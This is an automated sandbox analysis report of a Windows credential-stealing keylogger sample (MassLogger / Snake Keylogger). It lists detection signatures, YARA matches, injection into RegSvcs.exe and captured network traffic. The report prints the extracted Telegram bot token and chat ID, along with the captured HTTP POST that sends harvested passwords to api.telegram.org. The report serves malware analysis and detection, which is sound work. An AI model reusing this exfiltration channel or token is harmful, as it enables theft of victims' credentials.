Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
njVvgA8pEB.exe

Overview

General Information

Sample name:njVvgA8pEB.exe
renamed because original name is a hash value
Original sample name:d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c.exe
Analysis ID:1588596
MD5:d689d0763faaa679d5df32a3c14f9708
SHA1:928a1e168d684e9a1179d6c023e52cb33da1c26b
SHA256:d0d59448b6afccf0fdfb1a8cdfcc65b3f6af5094aad27b83b580009310fdff6c
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • njVvgA8pEB.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: D689D0763FAAA679D5DF32A3C14F9708)
    • RegSvcs.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • njVvgA8pEB.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: D689D0763FAAA679D5DF32A3C14F9708)
      • RegSvcs.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\njVvgA8pEB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x1c7d9:$a1: get_encryptedPassword
          • 0x1c7ad:$a2: get_encryptedUsername
          • 0x1c871:$a3: get_timePasswordChanged
          • 0x1c789:$a4: get_passwordField
          • 0x1c7ef:$a5: set_encryptedPassword
          • 0x1c5bc:$a7: get_logins
          • 0x1bb2e:$a8: GetOutlookPasswords
          • 0x1b042:$a9: StartKeylogger
          • 0x19aa3:$a10: KeyLoggerEventArgs
          • 0x19a72:$a11: KeyLoggerEventArgsEventHandler
          • 0x1c690:$a13: _encryptedPassword
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          0.2.njVvgA8pEB.exe.ff0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          3.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 89 88 44 24 2B 88 44 24 2F B0 75 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          3.2.RegSvcs.exe.4295570.6.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            3.2.RegSvcs.exe.4295570.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 95 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T02:55:29.319000+010020577441Malware Command and Control Activity Detected192.168.2.449732149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T02:55:22.058287+010028032742Potentially Bad Traffic192.168.2.449730158.101.44.24280TCP
              2025-01-11T02:55:28.308297+010028032742Potentially Bad Traffic192.168.2.449730158.101.44.24280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T02:55:29.019529+010018100081Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}
              Source: RegSvcs.exe.7300.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}
              Multi AV Scanner detection for submitted file
              Source: njVvgA8pEB.exeVirustotal: Detection: 61%Perma Link
              Source: njVvgA8pEB.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: njVvgA8pEB.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: njVvgA8pEB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: njVvgA8pEB.exe, 00000000.00000003.1720188665.0000000003940000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1720346942.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1736838584.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1731957014.0000000003D30000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_011DE0C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0324F181h3_2_0324EED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0324F8D7h3_2_0324F4B8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49732 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49732 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficTCP traffic: 192.168.2.4:63099 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b91c731df5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 158.101.44.242:80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_003822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003822EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b91c731df5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003370000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000003.00000002.4189028635.0000000005882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsXWx
              Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000339D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000003.00000002.4187157369.00000000032F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437
              Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: RegSvcs.exe, 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000003.00000002.4187157369.000000000337C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00384164
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00384164
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_00383F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00383F66
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0037001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0037001C
              Source: C:\Users\user\Desktop\njVvgA8pEB.exeCode function: 0_2_0039CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0039CABC

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.njVvgA8pEB.exe.ff0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
